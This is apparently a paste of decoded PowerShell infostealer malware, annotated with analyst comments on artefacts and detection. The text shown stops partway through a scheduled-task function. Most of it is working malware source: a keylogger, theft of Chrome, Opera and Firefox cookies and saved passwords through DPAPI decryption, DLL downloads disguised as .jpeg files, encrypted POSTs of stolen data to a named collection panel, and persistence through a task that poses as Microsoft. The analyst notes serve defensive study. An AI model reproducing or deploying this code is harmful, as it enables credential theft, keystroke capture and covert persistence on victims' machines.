James_inthe_box

Decoded

Mar 6th, 2019
  # Analyst note: listing line 1 opens the original loader expression (Invoke-Expression over a
  # DeflateStream / FromBase64String reader, closed on listing line 870). In this paste the
  # Base64 blob has been replaced by the decoded script that follows.
  1. Invoke-ExPrESsiON ( "\" ( New-ObJECt systeM.iO.compresSIon.dEfLATestREAm([Io.mEMorYsTReAM][CoNVert]::FrOMbasE64StriNg('Add-Type -AssemblyName System.Security
  2. ##################
  # Base URL of the collection panel; every urlPOST / DownloadString call below is built from it.
  3. $global:panel_url = "http://f6lvapzvn1.linkpc.net/"
  4.  
  5. ##################
  # Download locations used by Add-SQLite. The URLs end in .jpeg but the responses are written
  # to disk as System.Data.SQLite.dll and SQLite.Interop.dll.
  6. $global:SystemDataSQLite = "http://www.9ory.com/uploads/1543938654841.jpeg"
  7. $global:x64SQLiteInterop = "http://www.9ory.com/uploads/1543938654852.jpeg"
  8. $global:x86SQLiteInterop = "http://www.9ory.com/uploads/1543938654863.jpeg"
  9. ##################
  # Lookup tables that turn a boolean into the string used in the hand-built JSON (bool) and in
  # the forged User-Agent (isprocess64, iswin64).
  10. $global:bool = @{
  11. $true = 'true'
  12. $false = 'false'
  13. }
  14. $global:isprocess64 = @{
  15. $true = 'x64'
  16. $false = 'x32'
  17. }
  18. $global:iswin64 = @{
  19. $true = 'Win64'
  20. $false= 'Win32'
  21.  
  22. }
  23.  
  24. $global:crlf = "`r`n"
  # Full command line of the running process, read through WMI by PID. Startup later splits it
  # into user environment variables so the same command can be re-launched.
  25. $global:commandline = (gwmi Win32_Process -Filter ("processid=" + $PID)).CommandLine
  26.  
  # Host artefact name: reused for the global mutex, the environment-variable prefix, the .log
  # file and the Startup .lnk (see the main section, Startup and BrowsersLOGGER).
  27. $global:name = 'eSRfqHDaxC'
  # Directory for the keystroke log; expanded at run time, with a fallback to $env:TEMP.
  28. $global:install = '%tmp%'
  29.  
  # Keystroke-capture script block. InitLOGGER runs it as a background job and passes the log
  # file path as $Path. It polls the keyboard through user32.dll and appends the translated
  # characters, grouped under the foreground window title, to that file.
  # Detection note: the DllImport signatures below (GetAsyncKeyState, ToUnicodeEx,
  # GetForegroundWindow, ...) are compiled with Add-Type, so they appear in clear text in
  # PowerShell script-block logging when that logging is enabled.
  30. $global:scriptblock_logger = {
  31.  
  32. param($Path)
  33.  
  34. if (-not $Path) {exit}
  35.  
  36. $signatures = @'
  37. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  38. public static extern short GetAsyncKeyState(int virtualKeyCode);
  39. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  40. public static extern int GetKeyboardState(byte[] keystate);
  41. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  42. public static extern int MapVirtualKey(uint uCode, int uMapType);
  43. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  44. public static extern int ToUnicodeEx(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags, IntPtr dwhkl);
  45. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  46. public static extern IntPtr GetKeyboardLayout(int idThread);
  47. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  48. public static extern IntPtr GetForegroundWindow();
  49. [DllImport("user32.dll", CharSet=CharSet.Auto , SetLastError=true)]
  50. public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out int lpdwProcessId);
  51. [DllImport("user32.dll",CharSet=CharSet.Auto, SetLastError=true)]
  52. public static extern int GetWindowText(IntPtr hWnd, System.Text.StringBuilder lpString,int nMaxCount);
  53. [DllImport("user32.dll", CharSet=CharSet.Auto , SetLastError = true)]
  54. public static extern int GetWindowTextLength(IntPtr hwnd);
  55. '@
  56.  
  # Compile the P/Invoke wrapper once per session as type API.Win32.
  57. if($Script:API -eq $null){
  58. $Script:API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
  59. }
  60.  
  61. try
  62. {
  63. while ($true)
  64. {
  # Poll interval: every 40 ms all key codes 9..254 are checked.
  65. Start-Sleep -Milliseconds 40
  66.  
  67. for ($ascii = 9; $ascii -le 254; $ascii++)
  68. {
  69. $state = $Script:API::GetAsyncKeyState($ascii)
  # -32767 is 0x8001 as a signed short: the key is down and was pressed since the last call.
  70. if ($state -eq -32767)
  71. {
  72. $null = [console]::CapsLock
  73. $virtualKey = $API::MapVirtualKey($ascii, 3)
  74.  
  75. $kbstate = New-Object Byte[] 256
  76. $checkkbstate = $API::GetKeyboardState($kbstate)
  77.  
  78. $mychar = New-Object -TypeName System.Text.StringBuilder
  79.  
  # Read the title of the foreground window so keystrokes can be attributed to it.
  80. $myHwnd = $Script:API::GetForegroundWindow()
  81. $length = $Script:API::GetWindowTextLength($myHwnd)
  82. $sb = New-Object -TypeName System.Text.StringBuilder ($length + 1)
  83.  
  84.  
  85. $Script:API::GetWindowText($myHwnd, $sb, $sb.Capacity) | Out-Null;
  86. $sb = $sb.ToString()
  87.  
  88.  
  89. $myPid = [IntPtr]::Zero
  90.  
  # Translate the key with the keyboard layout of the thread that owns the foreground window.
  91. $myTid = $Script:API::GetWindowThreadProcessId($myHWND,[ref] $myPid)
  92. $dwhkl = $Script:API::GetKeyboardLayout($myTid)
  93. $success = $Script:API::ToUnicodeEx($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0,$dwhkl)
  94.  
  95. if ($success)
  96. {
  # Log format (UTF-16): Enter becomes CRLF; a change of window title starts a new
  # "[title] [timestamp]" header line before the character.
  97. if ($mychar.ToString()-eq "`r") {
  98. [System.IO.File]::AppendAllText($Path,"`r`n", [System.Text.Encoding]::Unicode)
  99. } else {
  100. if ($sb -eq $old_sb) {
  101. [System.IO.File]::AppendAllText($Path,$mychar, [System.Text.Encoding]::Unicode)
  102. } else {
  103. [System.IO.File]::AppendAllText($Path, "`r`n" + '[' + $sb + '] [' + [System.DateTime]::Now.ToString() + ']' + "`r`n" + $mychar, [System.Text.Encoding]::Unicode)
  104. $old_sb = $sb
  105. }
  106. }
  107.  
  108. }
  109. }
  110. }
  111. }
  112. }
  113. finally {}
  114. }
  115.  
  # Turns a 16-32 character passphrase into a 32-byte key: the string is right-padded with the
  # ASCII character "0" up to 32 characters and ASCII-encoded. Throws for any other length.
  116. function Set-Key {
  117. param([string]$string)
  118. $length = $string.length
  119. $pad = 32-$length
  120. if (($length -lt 16) -or ($length -gt 32)) {Throw "String must be between 16 and 32 characters"}
  121. $encoding = New-Object System.Text.ASCIIEncoding
  122. $bytes = $encoding.GetBytes($string + "0" * $pad)
  123. return $bytes
  124. }
  125.  
  126.  
  # Static key material embedded in the sample. urlPOST protects every "data" field with it, so
  # a captured request body can be decoded during analysis using the same passphrase and padding.
  127. $secret = Set-Key "never find this key"
  128.  
  # Encrypts $plainText with $key: the text is copied character by character into a
  # SecureString, which ConvertFrom-SecureString -Key then exports as an encrypted text blob.
  # Returns that blob; urlPOST sends it as the "data" form field.
  129. function Set-EncryptedData {
  130. param($key,[string]$plainText)
  131. $securestring = new-object System.Security.SecureString
  132. $chars = $plainText.toCharArray()
  133. foreach ($char in $chars) {$secureString.AppendChar($char)}
  134. $encryptedData = ConvertFrom-SecureString -SecureString $secureString -Key $key
  135. return $encryptedData
  136. }
  137.  
  # Builds the victim identifier sent as "uid" in every POST:
  # <BIOS serial number>_<user name>_<computer name>.
  138. function Uid {
  139.  
  140. $hwid = (Get-WMIObject -Class Win32_BIOS).SerialNumber + '_' + $env:UserName + '_' + $env:ComputerName
  141. return $hwid;
  142. }
  143.  
  # Serialises the collected cookie records into a JSON array by string concatenation.
  # Each record carries domain, expirationDate, hostOnly, httpOnly, name, path, sameSite,
  # secure, session, storeId, value and id; booleans are rendered through $global:bool.
  # Field values are inserted exactly as read from the browser database.
  144. function CookiesTo-MYJson ([System.Collections.ArrayList] $ArrayList)
  145. {
  146.  
  147.  
  148. $i = 0
  149. $ArrayJson = '[' + $global:crlf
  150. Foreach ($Array in $ArrayList) {
  151. $i++
  152. $ArrayJson += '{' + $global:crlf
  153.  
  154. $ArrayJson += '"domain": "' + $Array.domain +'",' + $global:crlf
  155. $ArrayJson += '"expirationDate": ' + $Array.expirationDate +',' + $global:crlf
  156. $ArrayJson += '"hostOnly": ' + $global:bool[$Array.hostOnly -eq $true]+',' + $global:crlf
  157. $ArrayJson += '"httpOnly": ' + $global:bool[$Array.httpOnly -eq $true]+',' + $global:crlf
  158. $ArrayJson += '"name": "' + $Array.name +'",' + $global:crlf
  159. $ArrayJson += '"path": "' + $Array.path +'",' + $global:crlf
  160. $ArrayJson += '"sameSite": "' + $Array.sameSite +'",' + $global:crlf
  161. $ArrayJson += '"secure": ' + $global:bool[$Array.secure -eq $true]+',' + $global:crlf
  162. $ArrayJson += '"session": ' +$global:bool[ $Array.session -eq $true]+',' + $global:crlf
  163. $ArrayJson += '"storeId": "' + $Array.storeId +'",' + $global:crlf
  164. $ArrayJson += '"value": "' + $Array.value +'",' + $global:crlf
  165. $ArrayJson += '"id": ' + $Array.id +'' + $global:crlf
  166.  
  167. $ArrayJson += '}'
  168.  
  # A comma separates records; none is written after the last one.
  169. if ($i -lt $ArrayList.Count) {
  170. $ArrayJson += ','
  171. }
  172. $ArrayJson += $global:crlf
  173.  
  174. }
  175. $ArrayJson += ']'
  176. return $ArrayJson
  177.  
  178.  
  179. }
  180.  
  # Serialises the collected login records (website, username, password, id) into a JSON array
  # by string concatenation, in the same way CookiesTo-MYJson does for cookies.
  181. function PasswordsTo-MYJson ([System.Collections.ArrayList] $ArrayList)
  182. {
  183.  
  184.  
  185. $i = 0
  186. $ArrayJson = '[' + $global:crlf
  187. Foreach ($Array in $ArrayList) {
  188. $i++
  189. $ArrayJson += '{' + $global:crlf
  190.  
  191. $ArrayJson += '"website": "' + $Array.website +'",' + $global:crlf
  192. $ArrayJson += '"username": "' + $Array.username +'",' + $global:crlf
  193. $ArrayJson += '"password": "' + $Array.password +'",' + $global:crlf
  194. $ArrayJson += '"id": ' + $Array.id +'' + $global:crlf
  195.  
  196. $ArrayJson += '}'
  197.  
  198. if ($i -lt $ArrayList.Count) {
  199. $ArrayJson += ','
  200. }
  201. $ArrayJson += $global:crlf
  202.  
  203. }
  204. $ArrayJson += ']'
  205. return $ArrayJson
  206.  
  207.  
  208. }
  209.  
  210.  
  211. ### PUBLIC FUNCTION #######
  212.  
  # Decrypts a DPAPI-protected byte array (the encrypted_value / password_value columns read by
  # the *SESSION and ChromePASS functions) with ProtectedData.Unprotect, no extra entropy, and
  # returns it as a string in the system default encoding. It therefore only yields data when
  # run on the victim host where the browser protected the value.
  213. function unProtecte ($data)
  214. {
  215. $decrypt_val = [System.Security.Cryptography.ProtectedData]::Unprotect($data, $null, [Security.Cryptography.DataProtectionScope]::Localmachine)
  216. $data_val = [System.Text.Encoding]::Default.GetString($decrypt_val)
  217. Return $data_val
  218. }
  # Returns the Chrome default-profile directory that holds the "Cookies" and "Login Data" files.
  219. function ChromeDB
  220. {
  221. Return "$($env:LOCALAPPDATA)\Google\Chrome\User Data\Default"
  222. }
  223.  
  # Returns the full path of every Firefox profile directory matching "*.default"; the caller
  # iterates over the result, so more than one profile may be processed.
  224. function FirefoxDB
  225. {
  226. $profilePath = "$($env:APPDATA)\Mozilla\Firefox\Profiles\*.default"
  227. $defaultProfile = $(Get-ChildItem $profilePath).FullName
  228. Return $defaultProfile
  229.  
  230. }
  231.  
  # Returns the Opera Stable profile directory that holds the "Cookies" file.
  232. function OperaDB
  233. {
  234. Return "$($env:APPDATA)\Opera Software\Opera Stable"
  235. }
  236.  
  237.  
  # Makes System.Data.SQLite available to the session. If the type cannot be instantiated, the
  # managed and native SQLite DLLs are downloaded into %TMP%\lib_x86 or %TMP%\lib_x64 (chosen by
  # pointer size) and loaded with Add-Type. Returns $true when the library is usable, otherwise
  # $false; the main section retries every 60 seconds until it succeeds.
  # Host artefacts: %TMP%\lib_<arch>\System.Data.SQLite.dll and SQLite.Interop.dll.
  238. function Add-SQLite {
  239.  
  240. switch ( [intptr]::Size ) {
  241. 4 { $binarch = 'x86' }
  242. 8 { $binarch = 'x64' }
  243. }
  # Probe: succeeds only when the SQLite assembly is already loaded in this session.
  244. try {
  245. $SQLiteCLASS = New-Object -TypeName System.Data.SQLite.SQLiteConnection
  246. } catch {
  247.  
  248. }
  249.  
  250. if ($SQLiteCLASS -eq $null) {
  251. if (![System.IO.File]::Exists("$env:tmp\lib_$binarch\SQLite.Interop.dll") -or ![System.IO.File]::Exists("$env:tmp\lib_$binarch\System.Data.SQLite.dll"))
  252. {
  253.  
  # Network artefact: WebClient GET requests for the three ".jpeg" URLs defined at the top of
  # the script, with the responses saved under .dll names.
  254. $SQLiteWEB = new-object System.Net.WebClient
  255. try {
  256. New-Item -ItemType Directory -Force -Path "$env:tmp\lib_$binarch\"
  257. Switch ($binarch) {
  258. 'x86' {
  259. $SQLiteWEB.DownloadFile($global:x86SQLiteInterop,"$env:tmp\lib_$binarch\SQLite.Interop.dll")
  260. $SQLiteWEB.DownloadFile($global:SystemDataSQLite,"$env:tmp\lib_$binarch\System.Data.SQLite.dll")
  261. }
  262.  
  263. 'x64' {
  264. $SQLiteWEB.DownloadFile($global:x64SQLiteInterop,"$env:tmp\lib_$binarch\SQLite.Interop.dll")
  265. $SQLiteWEB.DownloadFile($global:SystemDataSQLite,"$env:tmp\lib_$binarch\System.Data.SQLite.dll")
  266. }
  267. }
  268.  
  269.  
  270. } finally {
  271. $SQLiteWEB.Dispose()
  272. }
  273. }
  274. if ([System.IO.File]::Exists("$env:tmp\lib_$binarch\SQLite.Interop.dll") -and [System.IO.File]::Exists("$env:tmp\lib_$binarch\System.Data.SQLite.dll"))
  275. {
  276. Add-Type -Path "$env:tmp\lib_$binarch\System.Data.SQLite.dll"
  277. return $true
  278. } else {
  279. return $false
  280.  
  281. }
  282. } else {
  283. $SQLiteCLASS.Close()
  284. return $true
  285.  
  286. }
  287.  
  288.  
  289. }
  290.  
  # Sends $data to $link as an HTTP POST. The body is the form string
  # "uid=<Uid>&data=<Set-EncryptedData output>", UTF-8 encoded, with content type
  # application/x-www-form-urlencoded. Returns $true when a response object is received and
  # $false on any exception; callers loop with a 60-second sleep until it returns $true.
  # Network artefact: a fixed Chrome/64.0.3282.119 User-Agent whose parenthesised part is built
  # from the OS version string, Win64/Win32 and x64/x32.
  291. function urlPOST($link,$data)
  292. {
  293. try {
  294. $webrequest = [System.Net.WebRequest]::Create($link)
  295. $encodeddata = Set-EncryptedData -key $secret -plainText $data
  296. $uid = Uid
  297. $encodedcontent = [System.Text.Encoding]::UTF8.GetBytes("uid=$uid&data=$encodeddata")
  298. $webrequest.Method = 'POST'
  299. $webrequest.ContentType = "application/x-www-form-urlencoded"
  300.  
  301. $webrequest.UserAgent = $("Mozilla/5.0 ({0}; {1}; {2}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36" -f [Environment]::OSVersion.ToString().Replace("Microsoft Windows ", "Win"),
  302. $global:iswin64[[Environment]::Is64BitOperatingSystem -eq $true],
  303. $global:isprocess64[[Environment]::Is64BitProcess -eq $true])
  304.  
  305. if($encodedcontent.length -gt 0) {
  306. $webrequest.ContentLength = $encodedcontent.length
  307. $requestStream = $webrequest.GetRequestStream()
  308. $requestStream.Write($encodedcontent, 0, $encodedcontent.length)
  309. $requestStream.Flush()
  310. $requestStream.Close()
  311. }
  312.  
  # Only the presence of a response is checked; status code and body are not read.
  313. [System.Net.WebResponse] $resp = $webrequest.GetResponse();
  314. if($resp -ne $null)
  315. {
  316.  
  317. return $true
  318. }
  319. else
  320. {
  321. return $false
  322. }
  323. }catch {
  324. return $false
  325. }
  326.  
  327. }
  328. ###########################
  329.  
  330.  
  331.  
  # Reads cookies from the Opera "Cookies" SQLite file at $SQLiteDB.
  # $search is a quoted SQL LIKE pattern for host_key and $condition a quoted LIKE pattern for the
  # cookie name; both are pasted into the query text as passed by BrowsersCOOKIES.
  # Returns the JSON produced by CookiesTo-MYJson, or $null when the file is missing, nothing
  # matches, or any error occurs.
  332. function OperaSESSION ($SQLiteDB,$search,$condition) {
  333.  
  334. try {
  335.  
  336. if(![System.IO.File]::Exists($SQLiteDB)) {
  337. return $null
  338. }
  339. $cookies_array = New-Object System.Collections.Generic.List[System.Object]
  340. $conn = New-Object -TypeName System.Data.SQLite.SQLiteConnection
  341. $command = $conn.CreateCommand()
  342. try {
  343.  
  344. $conn.ConnectionString = "Data Source=$SQLiteDB"
  345. $conn.Open()
  346.  
  # Gate query: proceed only if the named cookie exists for the host pattern.
  347. $command.CommandText = "SELECT COUNT(*) AS Count FROM 'cookies' WHERE host_key LIKE $search AND name LIKE $condition"
  348. $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
  349. $dataset = New-Object System.Data.DataSet
  350. [void]$adapter.Fill($dataset)
  351.  
  352. if ($dataset.Tables.Count -eq 0 -or $dataset.Tables[0].rows[0].Count -eq 0) {
  353. return $null
  354. }
  355.  
  # Collection query: every cookie for the host pattern is taken, not only the named one.
  356. $command.CommandText = "SELECT * FROM 'cookies' WHERE host_key LIKE $search"
  357. $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
  358. $dataset = New-Object System.Data.DataSet
  359. [void]$adapter.Fill($dataset)
  360.  
  361. if ($dataset.Tables.Count -eq 0) {
  362. return $null
  363. }
  364.  
  365.  
  366. $i = 0
  367.  
  368. foreach ($row in $dataset.Tables[0])
  369. {
  370. $i++
  371. $cookies = @{}
  372. $cookies.domain = $row.host_key
  373. $cookies.expirationDate = $row.expires_utc
  374. $cookies.hostOnly = $false
  375. $cookies.httpOnly = ($row.httponly -eq 1)
  376. $cookies.name = $row.name
  377. $cookies.path = $row.path
  378. $cookies.sameSite = 'no_restriction'
  379. $cookies.secure = ($row.secure -eq 1)
  380. $cookies.session = ($row.has_expires -eq 0)
  381. $cookies.storeId = '0'
  # The value is decrypted through unProtecte; a failed decryption leaves it empty.
  382. try {
  383. $value = unProtecte($row.encrypted_value)
  384. }catch {
  385. $value = ''
  386. }
  387. $cookies.value = $value
  388. $cookies.id = $i
  389. $cookies_array.Add($cookies)
  390. }
  391.  
  392.  
  393. }
  394. finally {
  395. $command.Dispose()
  396. $conn.Close()
  397. }
  398. if ($cookies_array.Count -gt 0) {
  399.  
  400. return CookiesTo-MYJson $cookies_array
  401. } else {
  402. return $null
  403. }
  404. } catch {
  405. return $null
  406. }
  407.  
  408. }
  409.  
  # Reads cookies from a Firefox cookies.sqlite file at $SQLiteDB (table moz_cookies).
  # $search is a quoted SQL LIKE pattern for host and $condition a quoted LIKE pattern for the
  # cookie name. Unlike the Chrome and Opera variants, the value column is used as stored, with
  # no decryption step. Returns CookiesTo-MYJson output, or $null when the file is missing,
  # nothing matches, or any error occurs.
  410. function FirefoxSESSION ($SQLiteDB,$search,$condition) {
  411.  
  412. try {
  413.  
  414. if(![System.IO.File]::Exists($SQLiteDB)) {
  415. return $null
  416. }
  417. $cookies_array = New-Object System.Collections.Generic.List[System.Object]
  418. $conn = New-Object -TypeName System.Data.SQLite.SQLiteConnection
  419. $command = $conn.CreateCommand()
  420. try {
  421.  
  422. $conn.ConnectionString = "Data Source=$SQLiteDB"
  423. $conn.Open()
  424.  
  # Gate query: proceed only if the named cookie exists for the host pattern.
  425. $command.CommandText = "SELECT COUNT(*) AS Count FROM 'moz_cookies' WHERE host LIKE $search AND name LIKE $condition"
  426. $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
  427. $dataset = New-Object System.Data.DataSet
  428. [void]$adapter.Fill($dataset)
  429.  
  430. if ($dataset.Tables.Count -eq 0 -or $dataset.Tables[0].rows[0].Count -eq 0) {
  431. return $null
  432. }
  433.  
  # Collection query: every cookie for the host pattern is taken.
  434. $command.CommandText = "SELECT * FROM 'moz_cookies' WHERE host LIKE $search"
  435. $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
  436. $dataset = New-Object System.Data.DataSet
  437. [void]$adapter.Fill($dataset)
  438.  
  439. if ($dataset.Tables.Count -eq 0) {
  440. return $null
  441. }
  442.  
  443.  
  444. $i = 0
  445.  
  446. foreach ($row in $dataset.Tables[0])
  447. {
  448. $i++
  449. $cookies = @{}
  450. $cookies.domain = $row.host
  451. $cookies.expirationDate = $row.expiry
  452. $cookies.hostOnly = $false
  453. $cookies.httpOnly = ($row.isHttpOnly -eq 1)
  454. $cookies.name = $row.name
  455. $cookies.path = $row.path
  456. $cookies.sameSite = 'no_restriction'
  457. $cookies.secure = ($row.IsSecure -eq 1)
  458. $cookies.session = $false
  459. $cookies.storeId = '0'
  460. $cookies.value = $row.value
  461. $cookies.id = $i
  462. $cookies_array.Add($cookies)
  463. }
  464.  
  465.  
  466. }
  467. finally {
  468. $command.Dispose()
  469. $conn.Close()
  470. }
  471. if ($cookies_array.Count -gt 0) {
  472.  
  473. return CookiesTo-MYJson $cookies_array
  474. } else {
  475. return $null
  476. }
  477. } catch {
  478. return $null
  479. }
  480. }
  481.  
  482.  
  # Reads cookies from the Chrome "Cookies" SQLite file at $SQLiteDB.
  # $search is a quoted SQL LIKE pattern for host_key and $condition a quoted LIKE pattern for the
  # cookie name. The database is opened in place (no copy is made here, unlike ChromePASS).
  # Returns CookiesTo-MYJson output, or $null when the file is missing, nothing matches, or any
  # error occurs.
  483. function ChromeSESSION ($SQLiteDB,$search,$condition) {
  484.  
  485. try {
  486.  
  487. if(![System.IO.File]::Exists($SQLiteDB)) {
  488. return $null
  489. }
  490. $cookies_array = New-Object System.Collections.Generic.List[System.Object]
  491. $conn = New-Object -TypeName System.Data.SQLite.SQLiteConnection
  492. $command = $conn.CreateCommand()
  493. try {
  494.  
  495. $conn.ConnectionString = "Data Source=$SQLiteDB"
  496. $conn.Open()
  497.  
  # Gate query: proceed only if the named cookie exists for the host pattern.
  498. $command.CommandText = "SELECT COUNT(*) AS Count FROM 'cookies' WHERE host_key LIKE $search AND name LIKE $condition"
  499. $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
  500. $dataset = New-Object System.Data.DataSet
  501. [void]$adapter.Fill($dataset)
  502.  
  503. if ($dataset.Tables.Count -eq 0 -or $dataset.Tables[0].rows[0].Count -eq 0) {
  504. return $null
  505. }
  506.  
  507.  
  # Collection query: every cookie for the host pattern is taken, not only the named one.
  508. $command.CommandText = "SELECT * FROM 'cookies' WHERE host_key LIKE $search"
  509. $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
  510. $dataset = New-Object System.Data.DataSet
  511. [void]$adapter.Fill($dataset)
  512.  
  513. if ($dataset.Tables.Count -eq 0) {
  514. return $null
  515. }
  516.  
  517.  
  518. $i = 0
  519.  
  520. foreach ($row in $dataset.Tables[0])
  521. {
  522. $i++
  523. $cookies = @{}
  524. $cookies.domain = $row.host_key
  525. $cookies.expirationDate = $row.expires_utc
  526. $cookies.hostOnly = $false
  527. $cookies.httpOnly = ($row.httponly -eq 1)
  528. $cookies.name = $row.name
  529. $cookies.path = $row.path
  530. $cookies.sameSite = 'no_restriction'
  531. $cookies.secure = ($row.secure -eq 1)
  532. $cookies.session = ($row.has_expires -eq 0)
  533. $cookies.storeId = '0'
  # The value is decrypted through unProtecte; a failed decryption leaves it empty.
  534. try {
  535. $value = unProtecte($row.encrypted_value)
  536. }catch {
  537. $value = ''
  538. }
  539. $cookies.value = $value
  540. $cookies.id = $i
  541. $cookies_array.Add($cookies)
  542. }
  543.  
  544.  
  545. }
  546. finally {
  547. $command.Dispose()
  548. $conn.Close()
  549. }
  550. if ($cookies_array.Count -gt 0) {
  551.  
  552. return CookiesTo-MYJson $cookies_array
  553. } else {
  554. return $null
  555. }
  556. } catch {
  557. return $null
  558. }
  559. }
  560.  
  561.  
  # Reads saved logins from the Chrome "Login Data" SQLite file at $SQLiteDB.
  # The file is first copied to %TEMP% under a name that is only a yyyyMMddhhmm timestamp with
  # no extension, queried there, and the copy is removed in the finally block.
  # Returns PasswordsTo-MYJson output, or $null when the file is missing, the table is empty,
  # or any error occurs.
  # Host artefact: a short-lived, extension-less, 12-digit file name in %TEMP%.
  562. function ChromePASS ($SQLiteDB) {
  563.  
  564. try {
  565.  
  566. if(![System.IO.File]::Exists($SQLiteDB)) {
  567. return $null
  568. } else {
  569.  
  570. $TimeStamp = get-date -f yyyyMMddhhmm
  571. $SQLiteDB_Destination = "$env:temp\" + $TimeStamp
  572. Copy-Item -Path $SQLiteDB -Destination $SQLiteDB_Destination -Force
  573.  
  574. }
  575. $passwords_array = New-Object System.Collections.Generic.List[System.Object]
  576. $conn = New-Object -TypeName System.Data.SQLite.SQLiteConnection
  577. $command = $conn.CreateCommand()
  578. try {
  579.  
  580. $conn.ConnectionString = "Data Source=$SQLiteDB_Destination"
  581. $conn.Open()
  582.  
  583. $command.CommandText = "SELECT COUNT(*) AS Count FROM 'logins'"
  584. $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
  585. $dataset = New-Object System.Data.DataSet
  586. [void]$adapter.Fill($dataset)
  587.  
  588. if ($dataset.Tables.Count -eq 0 -or $dataset.Tables[0].rows[0].Count -eq 0) {
  589. return $null
  590. }
  591.  
  592.  
  593. $command.CommandText = "SELECT origin_url, username_value ,password_value FROM 'logins'"
  594. $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
  595. $dataset = New-Object System.Data.DataSet
  596. [void]$adapter.Fill($dataset)
  597.  
  598. if ($dataset.Tables.Count -eq 0) {
  599. return $null
  600. }
  601.  
  602.  
  603. $i = 0
  604.  
  605. foreach ($row in $dataset.Tables[0])
  606. {
  607. $i++
  608. $passwords = @{}
  609. $passwords.website = $row.origin_url
  610. $passwords.username = $row.username_value
  611.  
  # password_value is decrypted through unProtecte; a failed decryption leaves it empty.
  612. try {
  613. $value = unProtecte($row.password_value)
  614. }catch {
  615. $value = ''
  616. }
  617.  
  618. $passwords.password = $value
  619. $passwords.id = $i
  620. $passwords_array.Add($passwords)
  621. }
  622.  
  623.  
  624. }
  625. finally {
  626. $command.Dispose()
  627. $conn.Close()
  628. Remove-Item $SQLiteDB_Destination
  629. }
  630. if ($passwords_array.Count -gt 0) {
  631.  
  632. return PasswordsTo-MYJson $passwords_array
  633. } else {
  634. return $null
  635. }
  636. } catch {
  637. return $null
  638. }
  639. }
  640.  
  # Collects Chrome saved logins through ChromePASS and posts the JSON to
  # <panel_url>/api/chrome/submit, retrying every 60 seconds until urlPOST reports success.
  # Only Chrome is handled here; all errors are swallowed.
  641. function BrowsersLOGINS {
  642. try {
  643. $ChromeDB = ChromeDB
  644. $ChromePASS = ''
  645. $ChromePASS = ChromePASS "$ChromeDB\Login Data"
  646. if ($ChromePASS) {
  647. # $ChromeSESSION | Set-Content "$env:temp\c_logins.text"
  648.  
  649. while ((urlPOST "$global:panel_url/api/chrome/submit" $ChromePASS) -eq $false) {
  650. Start-Sleep -s 60
  651. }
  652.  
  653. }
  654. } catch {}
  655.  
  656.  
  657. }
  658.  
  # Creates a .lnk file at $destinationPATH through the WScript.Shell COM object.
  # With $isPARAM set, $sourceCMD is split at the first space into target path and arguments;
  # otherwise the whole string is the target. The shortcut uses icon index 3 of shell32.dll and
  # window style 7 (start minimised). Errors are swallowed.
  659. function Shortcut ($sourceCMD,$destinationPATH,$isPARAM = $false)
  660. {
  661. ### BEGIN Shortcut
  662.  
  663. $wshshell = New-Object -comObject WScript.Shell
  664. $shortcut = $wshshell.CreateShortcut($destinationPATH)
  665. try {
  666. $actionparams = $sourceCMD.Split(' ',2)
  667. if ($isPARAM -And $actionparams -is [array]) {
  668. $shortcut.TargetPath = $actionparams[0]
  669. if ($actionparams.Length -eq 2) {
  670. $shortcut.Arguments = $actionparams[1]
  671. }
  672.  
  673. } else {
  674. $shortcut.TargetPath = $sourceCMD
  675. }
  676.  
  677. $shortcut.IconLocation = "%SystemRoot%\System32\shell32.dll, 3"
  678. $shortcut.WindowStyle = "7"
  679. $shortcut.Save()
  680. } catch {
  681.  
  682. }
  683.  
  684. }
  685.  
  # Registers a scheduled task in the root folder through the Schedule.Service COM object.
  # Task properties visible here: Author "Microsoft Corporation", empty description, run level 0,
  # a daily trigger (type 2) starting five minutes from now that repeats every 59 minutes, and
  # an action built from $sourceCMD (split at the first space when $isPARAM is set).
  # The task name is $name, which is not defined in this function - presumably it resolves to
  # $global:name; confirm against a live sample. Errors are swallowed.
  # Hunting note: a root-folder task claiming a Microsoft author whose action is Cmd.exe with
  # %VAR% placeholders as arguments.
  686. function Taskscheduler ($sourceCMD,$isPARAM = $false) {
  687. ### BEGIN Taskscheduler
  688. try {
  689. $service = New-Object -ComObject Schedule.service
  690.  
  691. $service.Connect()
  692.  
  693. $task = $service.NewTask($null)
  694.  
  695. $task.RegistrationInfo.Author = "Microsoft Corporation"
  696. $task.RegistrationInfo.Description = ""
  697.  
  698. $task.Settings.Enabled = $true
  699. $task.Settings.AllowDemandStart = $true
  700.  
  701. $task.Principal.RunLevel = 0
  702.  
  703. $trigger = $task.Triggers.Create(2)
  704. $trigger.StartBoundary = [datetime]::Now.AddMinutes(5).ToString("yyyy-MM-dd'T'HH:mm:ss")
  705. $trigger.DaysInterval = 1
  706. $trigger.Enabled = $true
  707. $trigger.Repetition.StopAtDurationEnd = $false
  708. $trigger.Repetition.Interval = "PT59M"
  709.  
  710.  
  711. $action = $task.Actions.Create($null)
  712.  
  713. $actionparams = $sourceCMD.Split(' ',2)
  714. if ($isPARAM -And $actionparams -is [array]) {
  715. $action.Path = $actionparams[0]
  716. if ($actionparams.Length -eq 2) {
  717. $action.Arguments = $actionparams[1]
  718. }
  719. } else {
  720. $action.Path = $sourceCMD
  721. }
